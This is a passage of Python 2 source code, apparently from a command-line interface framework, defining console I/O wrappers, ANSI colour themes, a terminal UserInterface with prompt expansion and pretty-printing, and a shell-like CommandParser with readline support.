isatty(self):\n\t\treturn self.stdin.isatty() and self.stdout.isatty()\n\n\tdef errlog(self, text):\n\t\tself.stderr.write(\"%s\\n\" % (text,))\n\t\tself.stderr.flush()\n\nclass ConsoleErrorIO(object):\n\tdef __init__(self):\n\t\tself.stdin = sys.stdin\n\t\tself.stdout = sys.stderr\n\t\tself.stderr = sys.stderr\n\t\tself.mode = \"rw\"\n\t\tself.closed = 0\n\t\tself.softspace = 0\n\t\t# reading methods\n\t\tself.read = self.stdin.read\n\t\tself.readline = self.stdin.readline\n\t\tself.readlines = self.stdin.readlines\n\t\tself.xreadlines = self.stdin.xreadlines\n\t\t# writing methods\n\t\tself.write = self.stderr.write\n\t\tself.flush = self.stderr.flush\n\t\tself.writelines = self.stderr.writelines\n\t\n\tdef raw_input(self, prompt=\"\"):\n\t\treturn raw_input(prompt)\n\n\tdef close(self):\n\t\tself.stdout = None\n\t\tself.stdin = None\n\t\tself.closed = 1\n\t\tdel self.read, self.readlines, self.xreadlines, self.write\n\t\tdel self.flush, self.writelines\n\n\tdef fileno(self): # ??? punt, since mostly used by readers\n\t\treturn self.stdin.fileno()\n\n\tdef isatty(self):\n\t\treturn self.stdin.isatty() and self.stdout.isatty()\n\n\tdef errlog(self, text):\n\t\tself.stderr.write(\"%s\\n\" % (text,))\n\t\tself.stderr.flush()\n\n\n# themes define some basic \"look and feel\" for a CLI. This includes prompt srtrings and color set.\nclass Theme(object):\n\tNORMAL = RESET = \"\"\n\tBOLD = BRIGHT = \"\"\n\tBLACK = \"\"\n\tRED = \"\"\n\tGREEN = \"\"\n\tYELLOW = \"\"\n\tBLUE = \"\"\n\tMAGENTA = \"\"\n\tCYAN = \"\"\n\tWHITE = \"\"\n\tDEFAULT = \"\"\n\tGREY = \"\"\n\tBRIGHTRED = \"\"\n\tBRIGHTGREEN = \"\"\n\tBRIGHTYELLOW = \"\"\n\tBRIGHTBLUE = \"\"\n\tBRIGHTMAGENTA = \"\"\n\tBRIGHTCYAN = \"\"\n\tBRIGHTWHITE = \"\"\n\tUNDERSCORE = \"\"\n\tBLINK = \"\"\n\thelp_local = WHITE\n\thelp_inherited = YELLOW\n\thelp_created = GREEN\n\tdef __init__(self, ps1=\"> \", ps2=\"more> \", ps3=\"choose\", ps4=\"-> \"):\n\t\tself._ps1 = ps1 # main prompt\n\t\tself._ps2 = ps2 # more input needed\n\t\tself._ps3 = ps3 # choose prompt\n\t\tself._ps4 = ps4 # input prompt\n\t\tself._setcolors()\n\tdef _set_ps1(self, new):\n\t\tself._ps1 = str(new)\n\tdef _set_ps2(self, new):\n\t\tself._ps2 = str(new)\n\tdef _set_ps3(self, new):\n\t\tself._ps3 = str(new)\n\tdef _set_ps4(self, new):\n\t\tself._ps4 = str(new)\n\tps1 = property(lambda s: s._ps1, _set_ps1, None, \"primary prompt\")\n\tps2 = property(lambda s: s._ps2, _set_ps2, None, \"more input needed\")\n\tps3 = property(lambda s: s._ps3, _set_ps3, None, \"choose prompt\")\n\tps4 = property(lambda s: s._ps4, _set_ps4, None, \"text input prompt\")\n\nclass BasicTheme(Theme):\n\tdef _setcolors(cls):\n\t\t\"Base class for themes. Defines interface.\"\n\t\tcls.NORMAL = cls.RESET = \"\\x1b[0m\"\n\t\tcls.BOLD = cls.BRIGHT = \"\\x1b[1m\"\n\t\tcls.BLACK = \"\"\n\t\tcls.RED = \"\"\n\t\tcls.GREEN = \"\"\n\t\tcls.YELLOW = \"\"\n\t\tcls.BLUE = \"\"\n\t\tcls.MAGENTA = \"\"\n\t\tcls.CYAN = \"\"\n\t\tcls.WHITE = \"\"\n\t\tcls.DEFAULT = \"\"\n\t\tcls.GREY = \"\"\n\t\tcls.BRIGHTRED = \"\"\n\t\tcls.BRIGHTGREEN = \"\"\n\t\tcls.BRIGHTYELLOW = \"\"\n\t\tcls.BRIGHTBLUE = \"\"\n\t\tcls.BRIGHTMAGENTA = \"\"\n\t\tcls.BRIGHTCYAN = \"\"\n\t\tcls.BRIGHTWHITE = \"\"\n\t\tcls.UNDERSCORE = \"\\x1b[4m\"\n\t\tcls.BLINK = \"\\x1b[5m\"\n\t\tcls.help_local = cls.WHITE\n\t\tcls.help_inherited = cls.YELLOW\n\t\tcls.help_created = cls.GREEN\n\t_setcolors = classmethod(_setcolors)\n\nclass ANSITheme(BasicTheme):\n\t\"\"\"Defines tunable parameters for the UserInterface, to provide different color schemes and prompts.\"\"\"\n\tdef _setcolors(cls):\n\t\t# ANSI escapes for color terminals\n\t\tcls.NORMAL = cls.RESET = \"\\x1b[0m\"\n\t\tcls.BOLD = cls.BRIGHT = \"\\x1b[01m\"\n\t\tcls.BLACK = \"\\x1b[30m\"\n\t\tcls.RED = \"\\x1b[31m\"\n\t\tcls.GREEN = \"\\x1b[32m\"\n\t\tcls.YELLOW = \"\\x1b[33m\"\n\t\tcls.BLUE = \"\\x1b[34m\"\n\t\tcls.MAGENTA = \"\\x1b[35m\"\n\t\tcls.CYAN = \"\\x1b[36m\"\n\t\tcls.WHITE = \"\\x1b[37m\"\n\t\tcls.GREY = \"\\x1b[30;01m\"\n\t\tcls.BRIGHTRED = \"\\x1b[31;01m\"\n\t\tcls.BRIGHTGREEN = \"\\x1b[32;01m\"\n\t\tcls.BRIGHTYELLOW = \"\\x1b[33;01m\"\n\t\tcls.BRIGHTBLUE = \"\\x1b[34;01m\"\n\t\tcls.BRIGHTMAGENTA = \"\\x1b[35;01m\"\n\t\tcls.BRIGHTCYAN = \"\\x1b[36;01m\"\n\t\tcls.BRIGHTWHITE = \"\\x1b[37;01m\"\n\t\tcls.DEFAULT = \"\\x1b[39;49m\"\n\t\tcls.UNDERSCORE = \"\\x1b[4m\"\n\t\tcls.BLINK = \"\\x1b[5m\"\n\t\tcls.help_local = cls.BRIGHTWHITE\n\t\tcls.help_inherited = cls.YELLOW\n\t\tcls.help_created = cls.GREEN\n\t_setcolors = classmethod(_setcolors)\n\nDefaultTheme = ANSITheme\n\nclass UserInterface(object):\n\t\"\"\"An ANSI terminal user interface for CLIs. \"\"\"\n\tdef __init__(self, io, env=None, theme=None):\n\t\tself._io = io\n\t\tself._env = env or environ.Environ()\n\t\tassert hasattr(self._env, \"get\")\n\t\tself._env[\"_\"] = None\n\t\tself._cache = {}\n\t\tif io.isatty():\n\t\t\tself._termlen, self._termwidth, x, y = termtools.get_winsize(io.fileno())\n\t\telse:\n\t\t\tself._termlen, self._termwidth = 24, 80\n\t\tself.set_theme(theme)\n\t\tself._initfsm()\n\t\tself.initialize()\n\n\twinsize = property(lambda s: (s._termwidth, s._termlen), None, None, \"Terminal size, if available\")\n\n\tdef __del__(self):\n\t\ttry:\n\t\t\tself.finalize()\n\t\texcept:\n\t\t\tpass\n\n\tdef initialize(self, *args):\n\t\tpass\n\n\tdef finalize(self):\n\t\tpass\n\t\n\tdef close(self):\n\t\tif self._io is not None:\n\t\t\tself._io.close()\n\t\t\tself._io = None\n\n\tdef set_environ(self, env):\n\t\tassert hasattr(env, \"get\")\n\t\tself._env = env\n\t\tself._env[\"_\"] = None\n\n\tdef set_theme(self, theme):\n\t\tself._theme = theme or DefaultTheme()\n\t\tassert isinstance(self._theme, Theme), \"must supply a Theme object.\"\n\t\tself._env.setdefault(\"PS1\", self._theme.ps1)\n\t\tself._env.setdefault(\"PS2\", self._theme.ps2)\n\t\tself._env.setdefault(\"PS3\", self._theme.ps3)\n\t\tself._env.setdefault(\"PS4\", self._theme.ps4)\n\n\tdef clone(self, theme=None):\n\t\treturn self.__class__(self._io, self._env.copy(), theme or self._theme) \n\t\n\t# output methods\n\tdef Print(self, *objs):\n\t\twr = self._io.write\n\t\tif objs:\n\t\t\ttry:\n\t\t\t\tfor obj in objs[:-1]:\n\t\t\t\t\twr(str(obj))\n\t\t\t\t\twr(\" \")\n\t\t\t\tlast = objs[-1]\n\t\t\t\tif last is not None: # don't NL if last value is None (works like trailing comma).\n\t\t\t\t\twr(str(last))\n\t\t\t\t\twr(\"\\n\")\n\t\t\texcept PageQuitError:\n\t\t\t\treturn\n\t\telse:\n\t\t\twr(\"\\n\")\n\t\tself._io.flush()\n\n\tdef pprint(self, obj):\n\t\tself._format(obj, 0, 0, {}, 0)\n\t\tself._io.write(\"\\n\")\n\t\tself._io.flush()\n\t\n\tdef printf(self, text):\n\t\t\"Print text run through the prompt formatter.\"\n\t\tself.Print(self.format(text))\n\t\n\tdef print_obj(self, obj, nl=1):\n\t\tif nl:\n\t\t\tself._io.write(\"%s\\n\" % (obj,))\n\t\telse:\n\t\t\tself._io.write(str(obj))\n\t\tself._io.flush()\n\n\tdef print_list(self, clist, indent=0):\n\t\tif clist:\n\t\t\twidth = self._termwidth - 9\n\t\t\tindent = min(max(indent,0),width)\n\t\t\tps = \" \" * indent\n\t\t\ttry:\n\t\t\t\tfor c in clist[:-1]:\n\t\t\t\t\tcs = \"%s, \" % (c,)\n\t\t\t\t\tif len(ps) + len(cs) > width:\n\t\t\t\t\t\tself.print_obj(ps)\n\t\t\t\t\t\tps = \"%s%s\" % (\" \" * indent, cs)\n\t\t\t\t\telse:\n\t\t\t\t\t\tps += cs\n\t\t\t\tself.print_obj(\"%s%s\" % (ps, clist[-1]))\n\t\t\texcept PageQuitError:\n\t\t\t\tpass\n\n\tdef error(self, text):\n\t\tself.printf(\"%%R%s%%N\" % (text,))\n\n\t# report-like methods for test framework\n\tdef write(self, text):\n\t\tself._io.write(text)\n\tdef writeline(self, text=\"\"):\n\t\tself._io.writeline(text)\n\tdef writelines(self, lines):\n\t\tself._io.writelines(lines)\n\n\tdef add_heading(self, text, level=1):\n\t\ts = [\"\\n\"]\n\t\ts.append(\"%s%s\" % (\" \"*(level-1), text))\n\t\ts.append(\"%s%s\" % (\" \"*(level-1), \"-\"*len(text)))\n\t\tself.Print(\"\\n\".join(s))\n\n\tdef add_title(self, title):\n\t\tself.add_heading(title, 0)\n\n\t# called with the name of a logfile to report\n\tdef logfile(self, filename):\n\t\tself._io.write(\"LOGFILE: <%s>\\n\" % (filename,))\n\n\tdef add_message(self, msgtype, msg, level=1):\n\t\tself._io.write(\"%s%s: %s\\n\" % (\" \"*(level-1), msgtype, msg))\n\n\tdef add_summary(self, text):\n\t\tself._io.write(text)\n\n\tdef add_text(self, text):\n\t\tself._io.write(text)\n\n\tdef add_url(self, text, url):\n\t\tself._io.write(\"%s: <%s>\\n\" % (text, url))\n\n\tdef passed(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%GPASSED%N\"), msg, level)\n\n\tdef failed(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%RFAILED%N\"), msg, level)\n\t\n # XXX: new message type introduced for multiple UUTs\t\n def completed(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%GCOMPLETED%N\"), msg, level)\n\n\tdef incomplete(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%yINCOMPLETE%N\"), msg, level)\n\n\tdef abort(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%YABORT%N\"), msg, level)\n\n\tdef info(self, msg, level=1):\n msg_type = \"INFO [%s]\" % time.strftime('%H:%M:%S') \n\t\treturn self.add_message(msg_type, msg, level)\n\n\tdef diagnostic(self, msg, level=1):\n\t\treturn self.add_message(self.format(\"%yDIAGNOSTIC%N\"), msg, level)\n\t\n def debug(self, msg, level=1):\n\t\treturn self.add_message(self.format(\"%yDEBUG%N\"), msg, level)\n\n\n\tdef newpage(self):\n\t\tself._io.write(\"\\x0c\") # FF\n\n\tdef newsection(self):\n\t\tself._io.write(\"\\x0c\") # FF\n \n\t# user input\n\tdef _get_prompt(self, name, prompt=None):\n\t\treturn PROMPT_START_IGNORE+self.format(prompt or self._env[name])+PROMPT_END_IGNORE\n\n\tdef user_input(self, prompt=None):\n\t\treturn self._io.raw_input(self._get_prompt(\"PS1\", prompt))\n\n\tdef more_user_input(self):\n\t\treturn self._io.raw_input(self._get_prompt(\"PS2\"))\n\n\tdef choose(self, somelist, defidx=0, prompt=None):\n\t\treturn cliutils.choose(somelist, defidx, self._get_prompt(\"PS3\", prompt), input=self._io.raw_input)\n\t\n\tdef get_text(self, msg=None):\n\t\treturn cliutils.get_text(self._get_prompt(\"PS4\"), msg, input=self._io.raw_input)\n\n\tdef get_value(self, prompt, default=None):\n\t\treturn cliutils.get_input(self.format(prompt), default, self._io.raw_input)\n\n\tdef yes_no(self, prompt, default=True):\n\t\tyesno = cliutils.get_input(self.format(prompt), IF(default, \"Y\", \"N\"), self._io.raw_input)\n\t\treturn yesno.upper().startswith(\"Y\")\n\n\tdef get_key(self, prompt=None, timeout=None, default=\"\"):\n\t\tio = self._io\n\t\tif prompt:\n\t\t\tclear = \"\\b\"*len(prompt)+\" \"*len(prompt)+\"\\b\"*len(prompt)\n\t\t\tio.write(prompt)\n\t\t\tio.flush()\n\t\tif timeout is not None:\n\t\t\ttry:\n\t\t\t\tc = timer.iotimeout(get_key, (io.fileno(),), timeout=timeout)\n\t\t\texcept TimeoutError:\n\t\t\t\tc = default\n\t\telse:\n\t\t\tc = termtools.get_key(io.fileno())\n\t\tif prompt:\n\t\t\tio.write(clear) ; io.flush()\n\t\treturn c\n\t\n\tdef display(self, line):\n\t\t\"\"\"display a line of text, overwriting the old line.\"\"\"\n\t\tself._io.write(\"\\r\"+str(line).strip())\n\n\t# docstring/help formatters\n\tdef _format_doc(self, s, color):\n\t\ti = s.find(\"\\n\")\n\t\tif i > 0:\n\t\t\treturn color+s[:i]+self._theme.NORMAL+s[i:]+\"\\n\"\n\t\telse:\n\t\t\treturn color+s+self._theme.NORMAL+\"\\n\"\n\n\tdef help_local(self, text):\n\t\tself.Print(self._format_doc(text, self._theme.help_local))\n\n\tdef help_inherited(self, text):\n\t\tself.Print(self._format_doc(text, self._theme.help_inherited))\n\t\n\tdef help_created(self, text):\n\t\tself.Print(self._format_doc(text, self._theme.help_created))\n\n\tdef format(self, ps):\n\t\t\"Expand percent-exansions in a string and return the result.\"\n\t\tself._fsm.process_string(ps)\n\t\treturn self._getarg()\n\n\tdef register_expansion(self, key, func):\n\t\t\"\"\"Register a percent-expansion function for the format method. The\n\t\tfunction must take one argument, and return a string. The argument is\n\t\tthe character expanded on.\"\"\"\n\t\tkey = str(key)[0]\n\t\tif not self._EXPANSIONS.has_key(key):\n\t\t\tself._EXPANSIONS[key] = func\n\t\telse:\n\t\t\traise ValueError, \"expansion key %r already exists.\" % (key, )\n\t\n\t# FSM for prompt expansion\n\tdef _initfsm(self):\n\t\t# maps percent-expansion items to some value.\n\t\tself._EXPANSIONS = {\n\t\t\t\t\t\"I\":self._theme.BRIGHT, \n\t\t\t\t\t\"N\":self._theme.NORMAL, \n\t\t\t\t\t\"D\":self._theme.DEFAULT,\n\t\t\t\t\t\"R\":self._theme.BRIGHTRED, \n\t\t\t\t\t\"G\":self._theme.BRIGHTGREEN, \n\t\t\t\t\t\"Y\":self._theme.BRIGHTYELLOW,\n\t\t\t\t\t\"B\":self._theme.BRIGHTBLUE, \n\t\t\t\t\t\"M\":self._theme.BRIGHTMAGENTA, \n\t\t\t\t\t\"C\":self._theme.BRIGHTCYAN, \n\t\t\t\t\t\"W\":self._theme.BRIGHTWHITE, \n\t\t\t\t\t\"r\":self._theme.RED, \n\t\t\t\t\t\"g\":self._theme.GREEN, \n\t\t\t\t\t\"y\":self._theme.YELLOW,\n\t\t\t\t\t\"b\":self._theme.BLUE, \n\t\t\t\t\t\"m\":self._theme.MAGENTA, \n\t\t\t\t\t\"c\":self._theme.CYAN, \n\t\t\t\t\t\"w\":self._theme.WHITE, \n\t\t\t\t\t\"n\":\"\\n\", \"l\":self._tty, \"h\":self._hostname, \"u\":self._username, \n\t\t\t\t\t\"$\": self._priv, \"d\":self._cwd, \"L\": self._shlvl, \"t\":self._time, \n\t\t\t\t\t\"T\":self._date}\n\t\tf = FSM(0)\n\t\tf.add_default_transition(self._error, 0)\n\t\t# add text to args\n\t\tf.add_transition(ANY, 0, self._addtext, 0)\n\t\t# percent escapes\n\t\tf.add_transition(\"%\", 0, None, 1)\n\t\tf.add_transition(\"%\", 1, self._addtext, 0)\n\t\tf.add_transition(\"{\", 1, self._startvar, 2)\n\t\tf.add_transition(\"}\", 2, self._endvar, 0)\n\t\tf.add_transition(ANY, 2, self._vartext, 2)\n\t\tf.add_transition(ANY, 1, self._expand, 0)\n\t\tf.arg = ''\n\t\tself._fsm = f\n\t\n\tdef _startvar(self, c, fsm):\n\t\tfsm.varname = \"\"\n\n\tdef _vartext(self, c, fsm):\n\t\tfsm.varname += c\n\n\tdef _endvar(self, c, fsm):\n\t\tfsm.arg += str(self._env.get(fsm.varname, fsm.varname))\n\n\tdef _expand(self, c, fsm):\n\t\ttry:\n\t\t\targ = self._cache[c]\n\t\texcept KeyError:\n\t\t\ttry:\n\t\t\t\targ = self._EXPANSIONS[c]\n\t\t\texcept KeyError:\n\t\t\t\targ = c\n\t\t\telse:\n\t\t\t\tif callable(arg):\n\t\t\t\t\targ = str(arg(c))\n\t\tfsm.arg += arg\n\n\tdef _username(self, c):\n\t\tun = os.environ.get(\"USERNAME\") or os.environ.get(\"USER\")\n\t\tif un:\n\t\t\tself._cache[c] = un\n\t\treturn un\n\t\n\tdef _shlvl(self, c):\n\t\treturn str(self._env.get(\"SHLVL\", \"\"))\n\t\n\tdef _hostname(self, c):\n\t\thn = os.uname()[1]\n\t\tself._cache[c] = hn\n\t\treturn hn\n\t\n\tdef _priv(self, c):\n\t\tif os.getuid() == 0:\n\t\t\targ = \"#\"\n\t\telse:\n\t\t\targ = \">\"\n\t\tself._cache[c] = arg\n\t\treturn arg\n\t\n\tdef _tty(self, c):\n\t\tn = os.ttyname(self._io.fileno())\n\t\tself._cache[c] = n\n\t\treturn n\n\t\n\tdef _cwd(self, c):\n\t\treturn os.getcwd()\n\t\n\tdef _time(self, c):\n\t\treturn time.strftime(\"%H:%M:%S\", time.localtime())\n\t\n\tdef _date(self, c):\n\t\treturn time.strftime(\"%m/%d/%Y\", time.localtime())\n\n\tdef _error(self, input_symbol, fsm):\n\t\tself._io.errlog('Prompt string error: %s\\n%r' % (input_symbol, fsm.stack))\n\t\tfsm.reset()\n\n\tdef _addtext(self, c, fsm):\n\t\tfsm.arg += c\n\n\tdef _getarg(self):\n\t\tif self._fsm.arg:\n\t\t\targ = self._fsm.arg\n\t\t\tself._fsm.arg = ''\n\t\t\treturn arg\n\t\telse:\n\t\t\treturn None\n\t\n\t# pretty printing\n\tdef _format(self, obj, indent, allowance, context, level):\n\t\tlevel = level + 1\n\t\tobjid = id(obj)\n\t\tif objid in context:\n\t\t\tself._io.write(_recursion(obj))\n\t\t\treturn\n\t\trep = self._repr(obj, context, level - 1)\n\t\ttyp = type(obj)\n\t\tsepLines = len(rep) > (self._termwidth - 1 - indent - allowance)\n\t\twrite = self._io.write\n\n\t\tif sepLines:\n\t\t\tif typ is dict:\n\t\t\t\twrite('{\\n ')\n\t\t\t\tlength = len(obj)\n\t\t\t\tif length:\n\t\t\t\t\tcontext[objid] = 1\n\t\t\t\t\tindent = indent + 2\n\t\t\t\t\titems = obj.items()\n\t\t\t\t\titems.sort()\n\t\t\t\t\tkey, ent = items[0]\n\t\t\t\t\trep = self._repr(key, context, level)\n\t\t\t\t\twrite(rep)\n\t\t\t\t\twrite(': ')\n\t\t\t\t\tself._format(ent, indent + len(rep) + 2, allowance + 1, context, level)\n\t\t\t\t\tif length > 1:\n\t\t\t\t\t\tfor key, ent in items[1:]:\n\t\t\t\t\t\t\trep = self._repr(key, context, level)\n\t\t\t\t\t\t\twrite(',\\n%s%s: ' % (' '*indent, rep))\n\t\t\t\t\t\t\tself._format(ent, indent + len(rep) + 2, allowance + 1, context, level)\n\t\t\t\t\tindent = indent - 2\n\t\t\t\t\tdel context[objid]\n\t\t\t\twrite('\\n}')\n\t\t\t\treturn\n\n\t\t\tif typ is list:\n\t\t\t\twrite('[\\n')\n\t\t\t\tself.print_list(obj, 2)\n\t\t\t\twrite(']')\n\t\t\t\treturn\n\n\t\t\tif typ is tuple:\n\t\t\t\twrite('(\\n')\n\t\t\t\tself.print_list(obj, 2)\n\t\t\t\tif len(obj) == 1:\n\t\t\t\t\twrite(',')\n\t\t\t\twrite(')')\n\t\t\t\treturn\n\n\t\twrite(rep)\n\n\tdef _repr(self, obj, context, level):\n\t\treturn self._safe_repr(obj, context.copy(), None, level)\n\n\tdef _safe_repr(self, obj, context, maxlevels, level):\n\t\treturn _safe_repr(obj, context, maxlevels, level)\n\n# Return repr_string\ndef _safe_repr(obj, context, maxlevels, level):\n\ttyp = type(obj)\n\tif typ is str:\n\t\tif 'locale' not in sys.modules:\n\t\t\treturn repr(obj)\n\t\tif \"'\" in obj and '\"' not in obj:\n\t\t\tclosure = '\"'\n\t\t\tquotes = {'\"': '\\\\\"'}\n\t\telse:\n\t\t\tclosure = \"'\"\n\t\t\tquotes = {\"'\": \"\\\\'\"}\n\t\tqget = quotes.get\n\t\tsio = StringIO()\n\t\twrite = sio.write\n\t\tfor char in obj:\n\t\t\tif char.isalpha():\n\t\t\t\twrite(char)\n\t\t\telse:\n\t\t\t\twrite(qget(char, `char`[1:-1]))\n\t\treturn (\"%s%s%s\" % (closure, sio.getvalue(), closure))\n\n\tif typ is dict:\n\t\tif not obj:\n\t\t\treturn \"{}\"\n\t\tobjid = id(obj)\n\t\tif maxlevels and level > maxlevels:\n\t\t\treturn \"{...}\"\n\t\tif objid in context:\n\t\t\treturn _recursion(obj)\n\t\tcontext[objid] = 1\n\t\tcomponents = []\n\t\tappend = components.append\n\t\tlevel += 1\n\t\tsaferepr = _safe_repr\n\t\tfor k, v in obj.iteritems():\n\t\t\tkrepr = saferepr(k, context, maxlevels, level)\n\t\t\tvrepr = saferepr(v, context, maxlevels, level)\n\t\t\tappend(\"%s: %s\" % (krepr, vrepr))\n\t\tdel context[objid]\n\t\treturn \"{%s}\" % \", \".join(components)\n\n\tif typ is list or typ is tuple:\n\t\tif typ is list:\n\t\t\tif not obj:\n\t\t\t\treturn \"[]\"\n\t\t\tformat = \"[%s]\"\n\t\telif len(obj) == 1:\n\t\t\tformat = \"(%s,)\"\n\t\telse:\n\t\t\tif not obj:\n\t\t\t\treturn \"()\"\n\t\t\tformat = \"(%s)\"\n\t\tobjid = id(obj)\n\t\tif maxlevels and level > maxlevels:\n\t\t\treturn format % \"...\"\n\t\tif objid in context:\n\t\t\treturn _recursion(obj)\n\t\tcontext[objid] = 1\n\t\tcomponents = []\n\t\tappend = components.append\n\t\tlevel += 1\n\t\tfor o in obj:\n\t\t\torepr = _safe_repr(o, context, maxlevels, level)\n\t\t\tappend(orepr)\n\t\tdel context[objid]\n\t\treturn format % \", \".join(components)\n\n\tif typ is MethodType:\n\t\treturn method_repr(obj)\n\n\trep = repr(obj)\n\treturn rep\n\ndef _recursion(obj):\n\treturn (\"<Recursion on %s with id=%s>\" % (type(obj).__name__, id(obj)))\n\ndef safe_repr(value):\n\treturn _safe_repr(value, {}, None, 0)\n\ndef method_repr(method):\n\tmethname = method.im_func.func_name\n\t# formal names\n\tvarnames = list(method.im_func.func_code.co_varnames)[1:method.im_func.func_code.co_argcount]\n\tif method.im_func.func_defaults:\n\t\tld = len(method.im_func.func_defaults)\n\t\tvarlist = [\", \".join(varnames[:-ld]), \n\t\t\t\t \", \".join([\"%s=%r\" % (n, v) for n, v in zip(varnames[-ld:], method.im_func.func_defaults)])]\n\t\treturn \"%s(%s)\" % (methname, \", \".join(varlist))\n\telse:\n\t\treturn \"%s(%s)\" % (methname, \", \".join(varnames))\n\ndef _reset_readline():\n\tif readline:\n\t\treadline.parse_and_bind(\"tab: complete\")\n\t\treadline.parse_and_bind(\"?: possible-completions\")\n\t\treadline.parse_and_bind(\"set horizontal-scroll-mode on\")\n\t\treadline.parse_and_bind(\"set page-completions on\")\n\t\treadline.set_history_length(500)\n\ndef get_history_file(obj):\n\t\"Utility to form a useful history file name from an object instance.\"\n\treturn os.path.join(os.environ[\"HOME\"], \".hist_%s\" % (obj.__class__.__name__,))\n\nclass CommandParser(object):\n\t\"\"\"Reads an IO stream and parses input similar to Bourne shell syntax.\n\tCalls command methods for each line. Handles readline completer.\"\"\"\n\tVARCHARS = r'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_?'\n\t_SPECIAL = {\"r\":\"\\r\", \"n\":\"\\n\", \"t\":\"\\t\", \"b\":\"\\b\"}\n\tdef __init__(self, cmdobj=None, logfile=None, historyfile=None):\n\t\tself.reset(cmdobj)\n\t\tself._logfile = logfile\n\t\tif historyfile:\n\t\t\tself._historyfile = os.path.expanduser(os.path.expandvars(str(historyfile)))\n\t\telse:\n\t\t\tself._historyfile = None\n\t\tself._init()\n\t\tif readline:\n\t\t\tif self._historyfile:\n\t\t\t\ttry:\n\t\t\t\t\treadline.read_history_file(self._historyfile)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\tdef _rl_completer(self, text, state):\n\t\tif state == 0:\n\t\t\tcurr = readline.get_line_buffer()\n\t\t\tb = readline.get_begidx()\n\t\t\tif b == 0:\n\t\t\t\tcomplist = self._cmd.get_completion_scope(\"commands\")\n\t\t\telse: # complete based on scope keyed on previous word\n\t\t\t\tword = curr[:b].split()[-1]\n\t\t\t\tcomplist = self._cmd.get_completion_scope(word)\n\t\t\tself._complist = filter(lambda s: s.startswith(text), complist)\n\t\ttry:\n\t\t\treturn self._complist[state]\n\t\texcept IndexError:\n\t\t\treturn None\n\n\tdef close(self):\n\t\tself.reset()\n\n\tdef __del__(self):\n\t\tif readline:\n\t\t\tif self._historyfile:\n\t\t\t\ttry:\n\t\t\t\t\treadline.write_history_file(self._historyfile)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\tdef reset(self, newcmd=None):\n\t\tself._cmds = []\n\t\tself._cmd = None\n\t\tself.arg_list = []\n\t\tself._buf = \"\"\n\t\tif newcmd:\n\t\t\tself.push_command(newcmd)\n\t\n\tcommands = property(lambda s: s._cmd, None, None)\n\n\tdef push_command(self, newcmd):\n\t\tlvl = int(newcmd._environ.setdefault(\"SHLVL\", 0))\n\t\tnewcmd._environ[\"SHLVL\"] = lvl+1\n\t\tself._cmds.append(newcmd)\n\t\tself._cmd = newcmd # current command holder\n\t\tcmdlist = newcmd.get_commands()\n\t\tnewcmd.add_completion_scope(\"commands\", cmdlist )\n\t\tnewcmd.add_completion_scope(\"help\", cmdlist )\n\n\tdef pop_command(self, returnval=None):\n\t\tcmd = self._cmds.pop()\n\t\tcmd.finalize()\n\t\tif self._cmds:\n\t\t\tself._cmd = self._cmds[-1]\n\t\t\tif returnval:\n\t\t\t\tself._cmd.handle_subcommand(returnval)\n\t\telse:\n\t\t\traise CommandQuit, \"last command object quit.\"\n\n\tdef command_setup(self, obj, prompt=None):\n\t\tif self._cmd:\n\t\t\tself._cmd._setup(obj, prompt)\n\n\tdef parse(self, url):\n\t\timport urllib\n\t\tfo = urllib.urlopen(url)\n\t\tself.parseFile(fo)\n\t\tfo.close()\n\n\tdef parseFile(self, fo):\n\t\tdata = fo.read(4096)\n\t\twhile data:\n\t\t\tself.feed(data)\n\t\t\tdata = fo.read(4096)\n\n\tdef interact(self, cmd=None):\n\t\t_reset_readline()\n\t\tif cmd and isinstance(cmd, BaseCommands):\n\t\t\tself.push_command(cmd)\n\t\tif readline:\n\t\t\toc = readline.get_completer()\n\t\t\treadline.set_completer(self._rl_completer)\n\t\ttry:\n\t\t\ttry:\n\t\t\t\twhile 1:\n\t\t\t\t\tui = self._cmd._ui\n\t\t\t\t\ttry:\n\t\t\t\t\t\tline = ui.user_input()\n\t\t\t\t\t\tif not line:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\twhile self.feed(line+\"\\n\"):\n\t\t\t\t\t\t\tline = ui.more_user_input()\n\t\t\t\t\texcept EOFError:\n\t\t\t\t\t\tself._cmd._print()\n\t\t\t\t\t\tself.pop_command()\n\t\t\texcept (CommandQuit, CommandExit): # last command does this\n\t\t\t\tpass\n\t\tfinally:\n\t\t\tif readline:\n\t\t\t\treadline.set_completer(oc)\n\t\t\t\tif self._historyfile:\n\t\t\t\t\ttry:\n\t\t\t\t\t\treadline.write_history_file(self._historyfile)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\n\tdef feed(self, text):\n\t\tif self._logfile:\n\t\t\tself._logfile.write(text)\n\t\ttext = self._buf + text\n\t\ti = 0 \n\t\tfor c in text:\n\t\t\ti += 1\n\t\t\ttry:\n\t\t\t\tself._fsm.process(c)\n\t\t\t\twhile self._fsm.stack:\n\t\t\t\t\tself._fsm.process(self._fsm.pop())\n\t\t\texcept EOFError:\n\t\t\t\tself.pop_command()\n\t\t\texcept CommandQuit:\n\t\t\t\tval = sys.exc_info()[1]\n\t\t\t\tself.pop_command(val.value)\n\t\t\texcept NewCommand, cmdex:\n\t\t\t\tself.push_command(cmdex.value)\n\t\tif self._fsm.current_state: # non-zero, stuff left\n\t\t\tself._buf = text[i:]\n\t\treturn self._fsm.current_state\n\n\tdef _init(self):\n\t\tf = FSM(0)\n\t\tf.arg = \"\"\n\t\tf.add_default_transition(self._error, 0)\n\t\t# normally add text to args\n\t\tf.add_transition(ANY, 0, self._addtext, 0)\n\t\tf.add_transition_list(\" \\t\", 0, self._wordbreak, 0)\n\t\tf.add_transition_list(\";\\n\", 0, self._doit, 0)\n\t\t# slashes\n\t\tf.add_transition(\"\\\\\", 0, None, 1)\n\t\tf.add_transition(\"\\\\\", 3, None, 6)\n\t\tf.add_transition(ANY, 1, self._slashescape, 0)\n\t\tf.add_transition(ANY, 6, self._slashescape, 3)\n\t\t# vars \n\t\tf.add_transition(\"$\", 0, self._startvar, 